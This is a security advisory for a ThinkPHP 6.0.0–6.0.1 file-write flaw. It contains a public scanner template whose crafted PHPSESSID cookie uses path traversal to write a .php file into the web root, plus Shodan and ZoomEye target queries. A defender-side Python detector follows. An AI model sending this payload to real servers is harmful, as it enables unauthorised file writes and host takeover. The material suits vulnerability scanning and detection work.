thinkphp6-arbitrary-write: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write

Date: 2025-08-01 | Affected software: ThinkPHP 6.0.0~6.0.1 | PoC: public

Vulnerability description

ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution: an attacker can write an arbitrary script file through this vulnerability and use it to take over the host. The payload is injected into the PHPSESSID cookie. In the vulnerable version, the payload is URL-encoded and returned as it is in the Set-Cookie header; in the fixed version, the session ID is returned as a 32-bit hexadecimal string instead.

PoC code [public]

id: thinkphp6-arbitrary-write

info:
  name: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write
  author: arliya
  severity: critical
  description: |
    ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution: an attacker can write an arbitrary script file through this vulnerability and use it to take over the host. The payload is injected into the PHPSESSID cookie. In the vulnerable version, the payload is URL-encoded and returned as it is in the Set-Cookie header; in the fixed version, the session ID is returned as a 32-bit hexadecimal string instead.
  reference:
    - https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591
    - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
    - https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml
  classification:
    cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: thinkphp
    product: thinkphp
    shodan-query: title:"ThinkPHP"
    zoomeye-query: app="ThinkPHP"
  tags: thinkphp,file-upload,rce,vuln
variables:
  random_filename: "{{to_lower(rand_base(11))}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=/../../../public/{{random_filename}}.php
        Content-Type: application/x-www-form-urlencoded
      - |
        GET /{{random_filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_1
        words:
          - "Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php"

      - type: dsl
        dsl:
          - "status_2 == 200"
# digest: 4a0a0047304502200d8d1bea0f0853a869dbe8b9e79e55afeac57042ff2dddd390c33c67c27c36d7022100d19f40739f3a1fe0b0914f69079bb4762e9e3a2e0aae640f0f0d810a4c4d4f3d:922c64590222798bb761d5b6d8e72950
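The two checks the description and the template's matchers rely on, written up as a defender-side example (added here; not part of the template or of ThinkPHP): flag inbound PHPSESSID values that are not a plain alphanumeric token, and classify a server's Set-Cookie reply as reflected (the unpatched behaviour the word matcher looks for) or sanitized. The sample headers are constructed, the alphanumeric allow-list is an assumption, and "32-bit hexadecimal string" is read here as a 32-character hex id.

```python
import re
from urllib.parse import unquote

# Constructed sample request headers: one benign session id, two traversal attempts.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "Cookie: PHPSESSID=3f8c2a7b9d1e4c6a8b0f2d4e6a8c0b1d"),
    ("10.0.0.9", "Cookie: PHPSESSID=/../../../public/abcdefghijk.php"),
    ("10.0.0.9", "Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2Fabcdefghijk.php"),
]

# Allow-list for a session id (assumption): letters and digits only, bounded length.
SAFE_SESSION_ID = re.compile(r"[A-Za-z0-9]{1,64}")
# What a sanitized id from a patched server is assumed to look like: 32 hex chars.
HEX32 = re.compile(r"[0-9a-f]{32}")


def extract_session_id(header):
    """Return the URL-decoded PHPSESSID value from a Cookie/Set-Cookie header, or None."""
    m = re.search(r"PHPSESSID=([^;\s]*)", header)
    return unquote(m.group(1)) if m else None


def is_safe_session_id(value):
    """True only if the decoded id contains nothing but allow-listed characters."""
    return value is not None and SAFE_SESSION_ID.fullmatch(value) is not None


def flag_requests(requests):
    """Detection: list (source, decoded_id) for every request whose id fails the allow-list."""
    hits = []
    for src, header in requests:
        sid = extract_session_id(header)
        if sid is not None and not is_safe_session_id(sid):
            hits.append((src, sid))
    return hits


def classify_set_cookie(set_cookie_header, sent_value):
    """Patch check: 'reflected' if the server echoes the id it was sent unchanged,
    'sanitized' if it replaced it with a 32-char hex id, else 'unknown'."""
    sid = extract_session_id(set_cookie_header)
    if sid is None:
        return "no-session-cookie"
    if sid == sent_value:
        return "reflected"
    if HEX32.fullmatch(sid):
        return "sanitized"
    return "unknown"
```

The `flag_requests` check decodes before matching, so the percent-encoded form and the raw form of the same traversal string are both caught.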